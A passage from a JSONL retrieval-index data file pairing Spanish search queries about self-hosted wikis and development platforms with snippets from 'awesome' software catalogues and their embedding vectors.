-0.08546, 0.03806, -0.02646, -0.05554, 0.03315, 0.01319, 0.02632, 0.05658, -0.07852, 0.05347, -0.03538, -0.063, -0.04146, -0.02831, 0.01473, -0.02927, -0.00697, -0.00326, -0.01275, 0.03813, 0.03531, 0.00155, 0.04594, -0.0325, -0.0586, 0.02862, 0.02729, -0.00701, 0.02072, -0.02667, 0.03889, -0.03262, 0.01317, 0.07475, -0.03945, 0.02307, 0.03425, -0.05701, 0.0395, 0.08173, 0.04315, -0.00012, 0.00707, 0.03748, 0.00826, -0.01009, 0.0023, 0.01499, 0.01201, -0.01302, -0.01158, -0.02306, 0.03812, 0.02595, -0.07228, -0.01614, -0.01912, -0.01154, -0.01742, 0.09742, -0.02547, -0.05943, -0.01908, 0.02428, -0.05578, 0.07683, -0.0117, -0.07303, -0.0117, 0.07161, 0.00135, -0.0106, -0.00012, -0.01726]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: XWiki β€” Second generation wiki that allows the user to extend its functionalities with a powerful extension-based architecture [LGPL-2.1, Java/Docker/deb]. Zim β€” Graphical text editor used to maintain a collection of wiki pages. Each page can contain links to other pages, simple formatting and images [GPL-2.0, Python/deb].", "indexar": "que programa es una alternativa libre a WordPress para hacer wikis?", "v": [-0.00575, 0.00105, -0.10653, -0.07289, -0.0074, -0.02103, -0.03636, -0.18194, 0.00965, -0.1559, 0.00103, -0.18301, 0.01815, -0.01383, 0.02391, -0.07886, 0.0997, -0.07132, 0.16447, 0.01382, -0.08369, -0.07204, -0.07757, -0.02962, 0.00856, -0.07797, -0.02455, -0.01918, -0.05225, -0.0053, -0.0646, 0.045, -0.08455, -0.00713, -0.02973, 0.11613, 0.06155, 0.13122, 0.19646, -0.05407, -0.01125, -0.02851, 0.00126, 0.13915, -0.13497, -0.03736, 0.07519, -0.10818, 0.09696, 0.00566, 0.00608, -0.05946, -0.02895, 0.13811, 0.05449, -0.07282, 0.08126, -0.19774, -0.20008, 0.13319, -0.06434, 0.15234, -0.06259, -0.02114, 0.00264, 0.01544, 0.00726, 0.07888, 0.01807, 0.15409, 0.0568, -0.09898, 0.02068, -0.11506, -0.05852, 0.04381, -0.0504, 0.01956, -0.04969, -0.08549, -0.00178, -0.04079, 0.11983, 0.05589, -0.10749, -0.05718, 0.01826, -0.07373, 0.01466, 0.12172, 0.08916, 0.07124, 0.0257, 0.09083, -0.02168, -0.10831, 0.05171, -0.01952, 0.02138, 0.07619, -0.00359, -0.05447, -0.02628, -0.06001, 0.02588, 0.00832, 0.04303, 0.0585, -0.12656, -0.00463, 0.04887, 0.06938, -0.03932, 0.0021, -0.08116, -0.01744, 0.0315, 0.05311, 0.00063, -0.00052, -0.00953, 0.05819, -0.08524, -0.04109, 0.12638, 0.15233, -0.00833, 0.11135, -0.03744, 0.03066, 0.08822, -0.0308, -0.08731, 0.04831, -0.13642, 0.00988, 0.06838, 0.02768, 0.00559, -0.00203, -0.02586, -0.05146, 0.07248, 0.00706, -0.0016, -0.06768, -0.00064, -0.00524, 0.01237, -0.00016, -0.04123, -0.00011, -0.01845, 0.06279, -0.07918, 0.01902, 0.01531, 0.00129, -0.05136, 0.06757, -0.06466, -0.0592, 0.00742, -0.03239, 0.029, -0.0383, 0.00498, 0.02228, -0.007, -0.02383, -0.00572, 0.11786, 0.06704, -0.07957, 0.03717, 0.01585, 0.04807, -0.05878, 0.03736, -0.0185, -0.03811, -0.00252, -0.0348, -0.00816, -0.00565, -0.02954, -0.03512, 0.09008, -0.02972, 0.04795, -0.0934, -0.03336, 0.01386, -0.05516, 0.00491, 0.06268, 0.00965, -0.02127, 0.00581, -0.02107, -0.04405, -0.02195, 0.04215, 0.02051, 0.00112, 0.00686, 0.02955, -0.01284, 0.08996, 0.05658, -0.01802, -0.01592, -0.01821, 0.0203, -0.01253, -0.02732, -0.03838, 0.0228, 0.02649, 0.01681, 0.03442, 0.01004, 0.00293, 0.04725, 0.0191, -0.00715, 0.0056, 0.0146, -0.00018, 0.02872, -0.00714, -0.07062, 0.00628, 0.02101, 0.02181, -0.05228, 0.00263, -0.00404, 0.02251, 0.0243, -0.00694, 0.00762, 0.00998, 0.00624, -0.01103, 0.00053, -0.02964, -0.0291, 0.00586, 0.01067, -0.01468, 0.01781, -0.01673, -0.00399, -0.00129, 0.04968]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: XWiki β€” Second generation wiki that allows the user to extend its functionalities with a powerful extension-based architecture [LGPL-2.1, Java/Docker/deb]. Zim β€” Graphical text editor used to maintain a collection of wiki pages. Each page can contain links to other pages, simple formatting and images [GPL-2.0, Python/deb].", "indexar": "con que puedo montar un sistema de wiki autoalojado fΓ‘cil?", "v": [-0.05292, 0.04136, -0.1507, -0.07476, -0.18012, -0.02553, -0.06181, -0.00288, -0.17863, -0.11518, -0.08972, -0.19647, 0.04074, 0.06012, 0.11333, -0.04282, 0.08225, -0.21266, -0.02071, -0.07991, -0.02964, -0.03118, -0.06618, -0.08828, 0.06456, 0.07323, 0.10044, -0.12451, -0.16571, 0.01408, -0.03585, 0.15392, 0.09078, 0.04862, -0.05911, -0.03741, 0.06715, 0.07466, 0.12894, 0.01626, -0.06836, -0.11437, 0.01445, -0.00086, 0.10242, 0.06287, 0.07957, -0.11211, -0.04414, -0.07703, 0.1103, -0.08181, -0.0848, -0.00721, -0.08528, -0.1123, 0.19308, 0.02905, 0.01038, 0.04257, 0.00896, 0.09979, -0.08853, 0.06936, -0.0168, -0.02812, -0.00446, 0.01295, -0.05866, 0.03666, -0.02895, -0.19162, 0.11391, 0.05173, 0.05077, 0.03261, 0.0228, 0.00307, -0.00146, 0.06538, -0.06468, 0.04475, -0.05579, 0.04969, 0.03668, -0.0213, 0.01624, -0.01281, 0.09656, 0.00191, -0.00748, -0.05381, 0.09609, 0.01154, 0.00943, -0.06933, 0.03239, 0.03984, -0.03182, -0.0126, -0.0252, -0.07725, 0.02905, 0.07892, -0.03199, -0.08489, 0.05209, 0.04473, 0.09795, -0.03326, 0.0279, 0.04495, -0.06125, -0.00618, -0.02103, 0.04043, 0.01039, 0.19256, -0.06977, -0.03685, -0.02512, 0.08357, 0.00376, -0.0197, 0.03968, 0.00345, 0.09524, 0.09479, 0.0108, 0.00566, 0.02032, -0.06568, -0.05695, -0.00665, -0.01015, 0.03243, -0.00699, 0.05649, -0.0152, 0.08184, 0.0101, 0.03178, 0.0278, -0.0585, 0.02879, -0.0002, 0.05061, -0.03964, 0.00248, -0.01544, -0.03043, 0.05235, 0.0167, -0.05982, -0.05182, -0.03733, 0.05183, -0.00955, 0.09841, -0.03173, 0.02531, 0.04509, -0.01766, -0.02406, 0.0443, -0.01894, -0.01526, 0.00267, -0.02295, -0.07419, -0.00955, 0.06829, 0.07774, 0.03448, 0.08749, 0.02701, -0.00634, -0.01387, -0.01122, 0.0484, -0.04526, 0.01254, -0.00333, 0.02578, -0.01577, 0.03268, -0.03665, 0.08772, -0.02574, -0.01623, 0.00472, 0.00097, 0.00151, 0.03758, 0.05968, 0.07188, -0.00735, 0.02012, -0.02469, -0.03058, -0.0335, -0.00364, 0.04169, -0.02202, -0.00212, -0.00607, 0.08677, 0.05329, 0.08852, 0.05776, 0.0204, 0.04665, 0.03433, -0.0495, 0.00883, 0.04591, -0.06136, 0.03326, -0.06454, -0.04572, 0.02473, -0.02134, 0.0564, 0.05283, -0.0239, -0.01085, -0.01874, -0.01288, -0.04376, -0.08658, 0.06037, -0.09166, 0.03348, 0.02205, 0.00208, -0.01031, -0.02266, 0.00855, 0.00477, 0.05725, 0.02066, 0.01429, 0.0644, -0.00672, -0.01757, -0.04768, 0.05031, -0.04026, -0.02564, -0.05843, -0.017, -0.03841, -0.03448, -0.00235, -0.05646, 0.01561]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: XWiki β€” Second generation wiki that allows the user to extend its functionalities with a powerful extension-based architecture [LGPL-2.1, Java/Docker/deb]. Zim β€” Graphical text editor used to maintain a collection of wiki pages. Each page can contain links to other pages, simple formatting and images [GPL-2.0, Python/deb].", "indexar": "cual es la mejor opcion open source para editar y mantener pΓ‘ginas de conocimiento?", "v": [-0.01026, 0.11871, -0.14196, -0.07261, 0.07742, -0.247, 0.00172, -0.06767, -0.17935, -0.13011, -0.04563, -0.12378, -0.0165, 0.00074, -0.04247, -0.00759, 0.20198, -0.03876, -0.01737, 0.01065, -0.02476, -0.0326, -0.08223, -0.02633, -0.08255, -0.07124, 0.01816, -0.02011, -0.06302, 0.07973, -0.01147, 0.08, 0.03059, -0.01595, -0.08406, 0.21729, 0.0609, 0.07068, -0.041, -0.03319, -0.14153, -0.04583, 0.00656, 0.17286, 0.04609, 0.02794, -0.0475, 0.14627, -0.05564, -0.01246, -0.05476, 0.03153, -0.10139, -0.07527, -0.07437, 0.04921, 0.16453, -0.04092, 0.04279, 0.01532, 0.04642, 0.05439, -0.01614, -0.13249, 0.00135, -0.0602, -0.07187, 0.06895, -0.06988, 0.0846, -0.06221, 0.04453, 0.04971, 0.08475, 0.01602, 0.02957, 0.00174, 0.04899, 0.07121, 0.01553, -0.01086, -0.00639, -0.12244, 0.03235, -0.08678, -0.11801, -0.05789, -0.036, -0.0367, -0.06022, 0.04608, 0.0637, -0.06311, 0.08054, -0.02363, -0.12396, -0.00426, 0.01404, 0.00995, 0.05215, 0.01445, -0.04114, -0.00733, 0.01307, -0.03848, -0.00925, 0.04049, -0.06437, -0.00395, 0.06561, 0.02477, 0.00951, -0.03, 0.03857, -0.06635, -0.01722, -0.01293, 0.01291, 0.01299, -0.05104, -0.07254, -0.10134, -0.09503, -0.00596, 0.06695, 0.01658, 0.09942, 0.0626, -0.02905, -0.05339, -0.01436, -0.07621, -0.03141, -0.02827, 0.02785, 0.00656, 0.09705, 0.01744, -0.01062, -0.09204, 0.05252, -0.00334, -0.02981, -0.05766, 0.04321, -0.04413, -0.01959, 0.02624, -0.01682, -0.05146, -0.06784, -0.05703, 0.06735, 0.07898, -0.01389, 0.00277, 0.01577, -0.02173, 0.06817, 0.06322, -0.00468, 0.0719, 0.00532, -0.0172, -0.0106, 0.02163, -0.03315, 0.021, 0.05444, -0.02135, -0.01338, 0.09734, -0.06042, -0.09314, -0.02412, -0.09321, -0.06496, -0.0056, 0.06088, 0.02263, 0.02389, -0.04002, -0.04246, 0.01181, -0.03448, -0.03058, 0.0445, -0.07652, -0.05443, -0.02904, 0.0459, 0.01153, -0.06681, -0.06543, 0.06251, -0.06115, -0.02727, -0.02207, 0.05963, 0.00261, -0.06249, 0.00319, -0.02106, -0.01898, 0.0423, 0.01299, -0.02851, -0.03293, -0.06335, -0.01424, 0.03661, -0.06625, 0.0431, -0.05183, -0.04146, 0.00046, 0.03874, -0.04694, -0.01114, -0.02845, 0.08474, 0.06705, -0.00876, -0.04828, 0.10127, -0.00408, 0.04199, 0.02783, 0.03757, 0.01692, -0.04348, -0.00111, -0.04939, -0.05551, 0.07117, 0.04357, 0.02838, 0.02994, -0.01213, -0.07088, 0.00568, 0.05627, -0.0269, -0.07328, 0.0442, -0.06233, -0.09776, 0.05062, -0.00997, -0.0568, -0.13464, 0.00452, 0.01118, -0.01935, 0.05999, -0.0997]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Node.js β€” Async non-blocking event-driven JavaScript runtime built on Chrome's V8 JavaScript engine. Cross-Platform β€” Writing cross-platform code on Node.js. Frontend Development. iOS β€” Mobile operating system for Apple phones and tablets. Android β€” Mobile operating system developed by Google. IoT & Hybrid Apps. Electron β€” Cross-platform native desktop apps using JavaScript/HTML/CSS. Cordova β€” JavaScript API for hybrid apps. React Native β€” JavaScript framework for writing natively rendering mobile apps for iOS and Android. Xamarin β€” Mobile app development IDE, testing, and distribution. Containers. eBPF β€” Virtual machine that allows you to write more efficient and powerful tracing and monitoring for Linux systems. Arch-based Projects β€” Linux distributions and projects based on Arch Linux. AppImage β€” Package apps in a single file that works on various mainstream Linux distributions. Omarchy β€” Opinionated Arch Linux and Hyprland desktop environment from the creator of Ruby on Rails. Screensavers. Apps. Open Source Apps.", "indexar": "con que lenguaje puedo desarrollar aplicaciones mΓ³viles para iOS y Android de forma rΓ‘pida?", "v": [-0.08241, 0.0808, -0.03445, -0.20154, -0.04392, 0.01754, -0.12274, 0.09337, -0.05935, 0.0743, -0.03741, -0.10348, -0.00468, -0.03033, 0.03298, -0.03244, 0.03372, -0.04535, -0.06512, -0.02932, -0.03096, 0.02758, -0.21489, -0.04677, -0.05466, 0.14559, -0.05459, 0.01237, -0.05719, -0.09911, -0.10525, -0.08653, 0.11304, -0.01563, -0.22725, -0.03096, -0.04722, 0.03861, -0.11168, -0.01255, 0.00121, 0.01324, -0.02278, 0.01247, 0.01453, 0.04691, 0.0435, -0.01744, -0.06292, -0.06762, 0.00453, -0.05024, 0.0019, 0.03848, -0.05441, 0.00896, 0.17532, -0.13353, 0.02001, -0.055, -0.07124, 0.09214, -0.04031, -0.00741, 0.11283, -0.01471, 0.09692, 0.14753, -0.03863, -0.05776, 0.08131, 0.06052, -0.07342, 0.13086, 0.0805, 0.12678, -0.14065, -0.01208, 0.03253, 0.0696, 0.00566, -0.03267, -0.03202, -0.00272, -0.02985, -0.01394, 0.01901, 0.03975, -0.01457, -0.05287, 0.0121, 0.00257, -0.08757, -0.075, -0.07895, -0.0919, 0.01485, 0.01066, 0.08136, 0.11806, 0.01744, -0.07498, -0.08233, 0.02484, -0.10975, -0.02672, 0.09428, -0.01641, 0.02396, -0.03363, -0.02363, -0.09322, 0.05522, 0.02897, -0.05254, -0.00501, 0.05543, -0.09819, -0.05344, -0.01696, -0.02244, -0.05329, -0.00978, -0.01573, 0.07656, 0.01154, 0.00197, 0.1108, 0.04022, 0.02176, 0.06657, -0.09218, 0.02532, 0.04848, -0.05447, 0.0866, 0.11414, 0.07254, 0.07413, 0.02413, 0.00823, 0.03014, -0.02896, -0.01406, 0.08698, 0.01818, -0.03501, -0.03039, 0.03499, -0.00154, 0.03415, -0.00158, -0.0363, 0.03301, -0.12036, -0.06462, 0.01437, -0.09544, -0.0131, 0.03805, -0.04616, -0.03152, -0.06659, -0.00291, -0.07178, -0.09692, 0.00022, 0.04055, 0.17829, 0.00689, 0.04894, 0.01233, 0.12216, -0.03678, -0.03166, 0.00302, 0.05439, 0.05696, 0.00057, -0.11916, -0.04621, -0.00765, -0.03121, -0.06834, 0.00151, -0.06777, -0.0199, -0.01383, -0.02052, -0.00281, -0.02277, 0.10811, 0.03762, -0.00366, 0.00997, -0.08053, -0.01428, -0.01289, -0.0058, -0.03185, -0.06087, -0.02631, 0.01126, 0.00646, 0.02841, 0.02675, 0.04169, 0.04583, -0.0289, 0.03769, 0.02299, 0.02012, 0.0767, 0.08245, 0.02348, -0.03357, -0.00113, 0.086, -0.00115, -0.01665, -0.02092, -0.02368, 0.02025, 0.01905, 0.01602, 0.0292, 0.00896, -0.02173, 0.00512, -0.00204, 0.01915, 0.0173, 0.02653, -0.0441, 0.04444, 0.06554, 0.02548, 0.00139, -0.03133, -0.03839, -0.03103, 0.06188, -0.0059, -0.0152, -0.12751, -0.05353, -0.05648, 0.00995, -0.02245, -0.07523, 0.00905, 0.04453, 0.09745, -0.03823, 0.01039, 0.02709]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Node.js β€” Async non-blocking event-driven JavaScript runtime built on Chrome's V8 JavaScript engine. Cross-Platform β€” Writing cross-platform code on Node.js. Frontend Development. iOS β€” Mobile operating system for Apple phones and tablets. Android β€” Mobile operating system developed by Google. IoT & Hybrid Apps. Electron β€” Cross-platform native desktop apps using JavaScript/HTML/CSS. Cordova β€” JavaScript API for hybrid apps. React Native β€” JavaScript framework for writing natively rendering mobile apps for iOS and Android. Xamarin β€” Mobile app development IDE, testing, and distribution. Containers. eBPF β€” Virtual machine that allows you to write more efficient and powerful tracing and monitoring for Linux systems. Arch-based Projects β€” Linux distributions and projects based on Arch Linux. AppImage β€” Package apps in a single file that works on various mainstream Linux distributions. Omarchy β€” Opinionated Arch Linux and Hyprland desktop environment from the creator of Ruby on Rails. Screensavers. Apps. Open Source Apps.", "indexar": "existe alguna herramienta o entorno que me permita crear aplicaciones de escritorio en Windows, macOS y Linux con el mismo cΓ³digo?", "v": [-0.04663, 0.08235, -0.07298, -0.21274, -0.05751, -0.17829, -0.19258, 0.0549, -0.10554, -0.09343, -0.05089, -0.15285, -0.00229, -0.09353, 0.04568, -0.02497, 0.06111, -0.13187, -0.02025, -0.01634, -0.04303, 0.04264, -0.21411, 0.02011, -0.00989, 0.00733, 0.04037, -0.12002, -0.11151, 0.02352, -0.03538, 0.0802, 0.03177, -0.03465, -0.12597, -0.02913, -0.00368, -0.02831, 0.00277, 0.15277, 0.06183, 0.08756, -0.01667, 0.15439, -0.01513, -0.06743, 0.05606, 0.02081, 0.00583, -0.05337, -0.02193, -0.16387, -0.09596, 0.00974, 0.09348, -0.09228, 0.22224, -0.11752, 0.04899, -0.00343, -0.13517, 0.09354, -0.02864, -0.0661, 0.02716, 0.00879, 0.05503, -0.019, -0.05698, 0.12219, -0.03891, 0.05528, -0.0111, -0.01397, 0.09309, 0.04972, -0.07148, -0.04379, 0.06023, 0.02425, 0.01608, 0.0349, -0.03392, -0.02335, -0.08776, -0.1865, 0.03469, 0.02065, 0.02217, -0.03012, 0.05576, 0.01029, -0.06042, 0.05599, 0.0846, -0.04995, 0.06545, 0.03478, 0.0168, 0.04462, -0.01236, -0.04644, -0.09635, 0.02918, -0.02244, 0.06653, 0.02513, -0.10857, -0.03133, -0.03216, 0.04367, -0.05094, 0.02652, 0.032, -0.07658, -0.04334, 0.02719, -0.06384, -0.00991, -0.07185, -0.04985, 0.02147, -0.06726, 0.01704, -0.02873, 0.01686, -0.00805, 0.14923, -0.05934, -0.03603, 0.01544, -0.1173, -0.05893, 0.02079, -0.09409, 0.04271, 0.01488, -0.07597, 0.01321, -0.03494, 0.05225, 0.0855, 0.02786, 0.01511, 0.03201, 0.04086, -0.00414, -0.01434, -0.02217, -0.03935, 0.01167, -0.0264, -0.03123, -0.03248, -0.12955, 0.02408, -0.01224, 0.07849, -0.00151, -0.02044, -0.06058, 0.00197, -0.01047, -0.00899, -0.06429, -0.02142, 0.01944, 0.03349, 0.05688, 0.04325, -0.03612, 0.04925, 0.05985, -0.07597, 0.01362, -0.08285, 0.03095, -0.02267, -0.05092, -0.0425, -0.04062, 0.02181, 0.04122, -0.04003, 0.00518, -0.00219, -0.00208, 0.05428, -0.04093, 0.02018, -0.02386, 0.05181, 0.0422, -0.05635, -0.00037, 0.02022, -0.00536, -0.04718, 0.01824, -0.01723, -0.08569, 0.03431, -0.01622, -0.06348, 0.06827, 0.06427, -0.0554, 0.04131, -0.0142, 0.03037, 0.02173, 0.00959, 0.03824, 0.01951, -0.0113, -0.03914, 0.0624, 0.0455, 0.04149, -0.02095, 0.02418, -0.02308, 0.03018, -0.03013, 0.01343, -0.04324, -0.04343, 0.02039, 0.02093, -0.01742, 0.05014, -0.03873, -0.00605, -0.0228, 0.01728, 0.02363, 0.03381, -0.03489, -0.04604, -0.02438, -0.05304, 0.05896, 0.02715, -0.0931, -0.08218, -0.02984, -0.02222, -0.04277, -0.05548, -0.05914, -0.01543, -0.01633, 0.06097, -0.04134, -0.02776, 0.03133]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Node.js β€” Async non-blocking event-driven JavaScript runtime built on Chrome's V8 JavaScript engine. Cross-Platform β€” Writing cross-platform code on Node.js. Frontend Development. iOS β€” Mobile operating system for Apple phones and tablets. Android β€” Mobile operating system developed by Google. IoT & Hybrid Apps. Electron β€” Cross-platform native desktop apps using JavaScript/HTML/CSS. Cordova β€” JavaScript API for hybrid apps. React Native β€” JavaScript framework for writing natively rendering mobile apps for iOS and Android. Xamarin β€” Mobile app development IDE, testing, and distribution. Containers. eBPF β€” Virtual machine that allows you to write more efficient and powerful tracing and monitoring for Linux systems. Arch-based Projects β€” Linux distributions and projects based on Arch Linux. AppImage β€” Package apps in a single file that works on various mainstream Linux distributions. Omarchy β€” Opinionated Arch Linux and Hyprland desktop environment from the creator of Ruby on Rails. Screensavers. Apps. Open Source Apps.", "indexar": "cual es una alternativa gratuita y abierta a los sistemas operativos de Apple y Google para poder escribir software?", "v": [-0.00541, 0.08651, -0.01455, -0.17863, -0.05085, -0.14296, -0.02761, -0.12122, -0.15572, 0.01264, -0.05489, -0.19984, 0.04144, 0.01722, 0.09188, -0.0931, 0.11559, -0.14701, 0.06146, -0.0099, -0.11352, 0.06265, -0.12914, -0.15662, -0.07341, 0.00938, -0.06271, -0.00802, -0.08122, 0.02209, -0.01209, -0.0034, 0.05657, -0.10484, -0.18025, 0.09814, 0.02677, 0.00947, 0.05325, 0.01951, -0.01029, -0.0148, -0.09903, 0.15855, 0.02128, 0.02452, 0.09073, 0.07294, -0.08054, -0.05163, -0.08087, -0.13835, -0.10126, -0.00823, 0.08706, -0.02247, 0.15223, -0.09844, -0.06267, -0.01595, -0.16081, 0.07884, 0.0163, -0.0483, 0.07073, -0.0077, 0.01508, 0.01549, -0.07361, 0.16307, -0.02024, 0.03204, -0.02646, 0.1093, 0.05078, 0.05869, -0.03385, -0.01801, -0.05001, 0.08568, 0.00389, -0.00983, -0.05048, 0.13053, -0.03615, -0.14018, -0.01605, -0.10767, -0.02727, -0.02192, 0.0267, 0.04535, -0.03918, 0.13189, 0.02538, -0.00578, 0.05843, -0.05217, -0.01331, 0.06501, 0.04255, -0.06226, -0.11701, 0.02313, -0.07828, -0.03336, 0.01526, 0.03071, 0.0552, 0.00519, -0.01031, -0.05324, 0.01006, 0.03086, -0.0032, -0.04608, 0.07179, -0.06463, -0.05845, -0.02976, -0.02753, 0.03708, -0.14578, -0.0463, 0.07616, 0.07387, 0.04088, 0.0414, -0.00309, -0.00673, 0.0366, -0.02201, -0.00495, -0.01027, -0.06106, 0.02132, 0.02888, -0.0098, 0.01084, -0.00033, 0.01639, 0.00652, 0.03135, -0.11715, 0.01767, -0.01019, -0.00297, -0.0792, -0.05553, -0.0992, -0.05433, 0.03908, -0.03848, 0.05465, -0.02208, 0.01885, -0.06497, -0.06107, -0.07887, -0.00494, -0.09599, 0.00444, -0.05015, 0.02006, -0.06154, -0.03649, -0.02132, -0.0221, 0.02773, 0.0159, -0.05513, 0.12304, 0.07237, -0.03734, 0.01293, -0.03703, -0.00696, -0.03388, 0.01298, -0.05428, -0.04977, 0.03709, -0.02639, -0.01989, -0.01343, -0.00624, -0.01246, -0.01702, 0.01243, 0.0265, 0.00321, 0.06186, -0.00108, -0.08675, 0.04231, -0.0504, -0.07215, -0.04932, 0.01838, -0.03029, -0.08178, -0.00738, -0.01662, -0.01221, -0.04278, -1e-05, 0.07389, 0.06995, -0.02944, 0.03678, 0.00259, 0.00565, 0.03672, 0.00918, -0.04248, -0.02601, -0.00338, 0.05581, 0.02562, -0.02201, 0.04452, 0.00766, 0.0484, 0.03788, 0.03916, 0.02772, 0.01469, 0.05914, -0.0102, -0.04358, -0.02274, -0.03033, 0.00362, 0.00365, 0.01231, -0.00168, 0.01275, 0.00802, -0.02955, -0.00268, 0.02801, 0.08589, 0.05447, -0.07701, -0.04202, -0.02695, -0.08535, -0.03925, -0.04503, -0.0533, -0.07193, 0.0598, 0.04347, -0.03817, 0.02827, 0.02007]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: watchOS β€” Operating system for the Apple Watch. JVM. Salesforce. Amazon Web Services. Windows β€” Consumer desktop operating system. PowerToys Run Plugins β€” Community plugins for the Windows quick launcher. IPFS β€” P2P hypermedia protocol. Fuse β€” Mobile development tools. Heroku β€” Cloud platform as a service. Raspberry Pi β€” Credit card-sized computer aimed at teaching kids programming, but capable of a lot more. Qt β€” Cross-platform GUI app framework. WebExtensions β€” Cross-browser extension system. Smart TV β€” Create apps for different TV platforms. GNOME β€” Simple and distraction-free desktop environment for Linux. KDE β€” A free software community dedicated to creating an open and user-friendly computing experience. .NET. Core. Roslyn β€” Open-source compilers and code analysis APIs for C# and VB.NET languages. DigitalOcean β€” Cloud computing platform designed for developers. Flutter β€” Google's mobile SDK for building native iOS and Android apps from a single codebase written in Dart.", "indexar": "con que programa puedo crear aplicaciones para Apple Watch y Android al mismo tiempo", "v": [-0.06057, 0.13261, 0.05098, -0.2343, -0.01569, 0.01112, -0.05657, 0.01154, -0.10393, 0.0411, -0.05872, -0.15771, -0.05493, -0.03089, -0.00588, -0.01982, -0.03031, -0.13807, 0.10324, 0.07522, -0.00288, 0.09468, -0.20973, -0.09103, -0.05163, 0.0925, 0.01552, 0.06221, -0.03831, -0.06316, -0.06296, -0.03892, 0.07124, -0.0462, -0.12483, -0.06571, 0.0015, -0.00429, -0.08764, 0.02386, -0.05265, 0.03166, -0.01973, 0.08112, 0.01806, 0.12699, 0.12576, 0.02027, -0.0675, 0.0052, -0.07277, -0.01502, -0.05385, 0.09241, 0.06973, -0.01824, 0.1306, -0.15695, -0.02203, -0.01755, -0.08379, 0.08034, -0.03091, -0.03052, 0.07774, -0.03933, 0.07365, 0.19746, -0.03291, 0.04192, -0.06092, -0.00343, -0.09937, 0.06288, 0.08239, 0.04255, -0.0732, -0.01554, -0.01451, -0.06574, -0.08543, -0.03529, -0.01844, 0.03547, -0.05582, -0.02521, 0.05847, 0.03427, -0.0305, -0.04838, -0.02189, 0.08456, -0.02245, 0.05866, 0.02143, -0.01435, 0.10729, -0.02985, 0.05244, 0.12215, 0.03353, -0.04799, -0.04338, 0.01923, -0.15957, 0.03257, 0.07589, 0.00363, 0.02651, -0.01035, -0.05889, -0.10179, -0.03535, -0.00571, -0.02619, 0.01339, 0.03214, -0.08413, -0.04968, -0.02501, -0.01313, -0.02391, -0.09762, -0.01771, 0.10734, 0.03356, -2e-05, 0.0678, 0.02263, 0.0603, 0.01804, -0.0598, -0.01836, 0.01931, -0.08862, 0.0014, 0.04433, 0.06887, 0.01776, 0.0057, 0.05778, 0.04035, 0.01519, -0.0403, 0.03661, -0.00123, -0.06887, -0.02155, 0.0477, 0.00328, 0.02377, 0.01633, -0.05587, 0.01084, -0.10261, -0.02763, -0.02579, -0.06404, 0.02498, 0.00281, -0.04589, -0.00297, -0.0954, -0.07405, -0.00089, -0.1147, 0.0222, 0.07157, 0.15195, 0.02138, -0.04613, 0.12444, 0.08449, -0.09889, -0.00738, -0.03436, 0.04148, -0.05548, 0.03463, -0.06342, -0.0667, 0.03454, 0.05764, -0.05109, -0.01735, -0.10101, -0.05308, 0.04606, 0.05493, 0.03037, -0.03656, 0.089, 0.05683, 0.0583, 0.03432, -0.04269, 0.02465, -0.0514, 0.00804, 0.01641, -0.08212, -0.03261, -0.0098, 0.02672, 0.04625, 0.0455, 0.00782, 0.10942, 0.00389, 0.06486, 0.00296, 0.02197, 0.0841, 0.06236, -0.02447, -0.04226, 0.05481, 0.06593, 0.00326, 0.04212, 0.00942, -0.00645, 0.03213, 0.03493, -0.01763, -0.03657, 0.05792, 0.03507, 0.01917, 0.00514, 0.00649, -0.05306, -0.00506, -0.04976, 0.04693, 0.029, 0.01824, -0.03199, -0.01057, -0.02519, -0.03849, 0.07968, 0.04033, -0.01478, -0.10056, 0.00144, -0.03377, 0.0302, -0.03302, -0.06439, -0.01195, 0.07306, 0.1065, -0.03846, 0.02022, 0.02158]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: watchOS β€” Operating system for the Apple Watch. JVM. Salesforce. Amazon Web Services. Windows β€” Consumer desktop operating system. PowerToys Run Plugins β€” Community plugins for the Windows quick launcher. IPFS β€” P2P hypermedia protocol. Fuse β€” Mobile development tools. Heroku β€” Cloud platform as a service. Raspberry Pi β€” Credit card-sized computer aimed at teaching kids programming, but capable of a lot more. Qt β€” Cross-platform GUI app framework. WebExtensions β€” Cross-browser extension system. Smart TV β€” Create apps for different TV platforms. GNOME β€” Simple and distraction-free desktop environment for Linux. KDE β€” A free software community dedicated to creating an open and user-friendly computing experience. .NET. Core. Roslyn β€” Open-source compilers and code analysis APIs for C# and VB.NET languages. DigitalOcean β€” Cloud computing platform designed for developers. Flutter β€” Google's mobile SDK for building native iOS and Android apps from a single codebase written in 